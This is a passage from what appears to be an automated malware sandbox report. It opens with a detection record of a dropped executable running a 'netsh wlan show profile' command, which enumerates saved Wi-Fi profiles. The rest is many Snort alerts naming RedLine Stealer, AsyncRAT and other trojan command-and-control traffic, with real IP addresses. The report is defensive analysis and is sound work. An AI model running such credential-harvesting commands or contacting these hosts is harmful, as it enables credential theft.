Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, ParentProcessId: 5720, ParentProcessName: 4336.tmp.Server.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6348, ProcessName: cmd.exe

Snort Signatures

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:23.876923
SID:	2019714
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:20.702090
SID:	2054071
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:11.211434
SID:	2054071
Source Port:	49945
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:05.900230
SID:	2054071
Source Port:	49936
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:23.914512
SID:	2054071
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:27.885798
SID:	2054071
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:10.743030
SID:	2054071
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:53.289576
SID:	2054071
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:02.431241
SID:	2054071
Source Port:	49927
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:24.902744
SID:	2054071
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:36.852023
SID:	2054071
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:20.361652
SID:	2054071
Source Port:	49954
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:27.540890
SID:	2054071
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:28.461699
SID:	2054071
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:21.262339
SID:	2054071
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 94.232.249.204

Timestamp:	07/06/24-13:27:32.251129
SID:	2046045
Source Port:	49779
Destination Port:	1912
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:21.524237
SID:	2054071
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:51.211391
SID:	2054071
Source Port:	49909
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 64.31.40.18

Timestamp:	07/06/24-13:27:16.324762
SID:	2054071
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:26.543923
SID:	2054071
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:50.321115
SID:	2054071
Source Port:	49908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:39.235519
SID:	2054071
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:26.055756
SID:	2054071
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:58.992696
SID:	2054071
Source Port:	49921
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:59.602954
SID:	2054071
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:16.854096
SID:	2054071
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:10.180094
SID:	2054071
Source Port:	49944
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:45.171914
SID:	2054071
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 75.119.203.100

Timestamp:	07/06/24-13:27:23.256466
SID:	2054071
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:01.558139
SID:	2054071
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:58.182973
SID:	2054071
Source Port:	49919
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:33.931746
SID:	2054071
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:06.260273
SID:	2054071
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:32.180435
SID:	2054071
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:58.758426
SID:	2054071
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:32.392018
SID:	2054071
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:40.242398
SID:	2054071
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:30.555667
SID:	2054071
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:46.868285
SID:	2054071
Source Port:	49901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:31.385483
SID:	2054071
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:22.166191
SID:	2054071
Source Port:	49956
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:34.995620
SID:	2054071
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:26.898974
SID:	2054071
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:15.166063
SID:	2054071
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:31.071363
SID:	2054071
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:18.885768
SID:	2054071
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:14.320671
SID:	2054071
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:17.072931
SID:	2054071
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:07.617738
SID:	2054071
Source Port:	49940
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic AsyncRAT Style SSL Cert - Source IP: 94.232.249.204 - Destination IP: 192.168.2.4

Timestamp:	07/06/24-13:27:49.444587
SID:	2035595
Source Port:	7707
Destination Port:	49797
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:55.258520
SID:	2054071
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:01.617854
SID:	2054071
Source Port:	49925
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:47.745851
SID:	2054071
Source Port:	49904
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:49.884185
SID:	2054071
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:18.962369
SID:	2054071
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:21.298450
SID:	2054071
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:48.614243
SID:	2054071
Source Port:	49906
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 94.232.249.204

Timestamp:	07/06/24-13:27:55.513329
SID:	2043231
Source Port:	49779
Destination Port:	1912
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:24.804114
SID:	2054071
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:00.774225
SID:	2054071
Source Port:	49923
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:16.102128
SID:	2054071
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:18.009499
SID:	2054071
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:03.274020
SID:	2054071
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:40.168982
SID:	2054071
Source Port:	49886
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:08.134245
SID:	2054071
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:12.583743
SID:	2054071
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:12.148826
SID:	2054071
Source Port:	49947
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:43.297660
SID:	2054071
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:52.930267
SID:	2054071
Source Port:	49912
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:30.242760
SID:	2054071
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:38.134119
SID:	2054071
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:19.523977
SID:	2054071
Source Port:	49953
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:35.333379
SID:	2054071
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:56.461823
SID:	2054071
Source Port:	49917
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:37.697215
SID:	2054071
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:09.898942
SID:	2054071
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:18.447888
SID:	2054071
Source Port:	49951
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:13.509566
SID:	2054071
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:56.133137
SID:	2054071
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:20.471851
SID:	2054071
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:29.539774
SID:	2054071
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:33.057733
SID:	2054071
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:36.461673
SID:	2054071
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious - Source IP: 192.168.2.4 - Destination IP: 75.119.203.100

Timestamp:	07/06/24-13:27:23.256466
SID:	2021697
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:57.914474
SID:	2054071
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:23.136376
SID:	2054071
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:41.186031
SID:	2054071
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:33.258669
SID:	2054071
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:06.742456
SID:	2054071
Source Port:	49939
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:13.975198
SID:	2054071
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:51.556830
SID:	2054071
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:04.543667
SID:	2054071
Source Port:	49932
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:23.876923
SID:	2054071
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:56.977998
SID:	2054071
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:08.993181
SID:	2054071
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:38.523776
SID:	2054071
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:22.525957
SID:	2054071
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:09.320698
SID:	2054071
Source Port:	49943
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:54.727535
SID:	2054071
Source Port:	49915
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:25.683914
SID:	2054071
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:04.964754
SID:	2054071
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:39.422769
SID:	2054071
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:34.133469
SID:	2054071
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:45.086633
SID:	2054071
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:17.944095
SID:	2054071
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

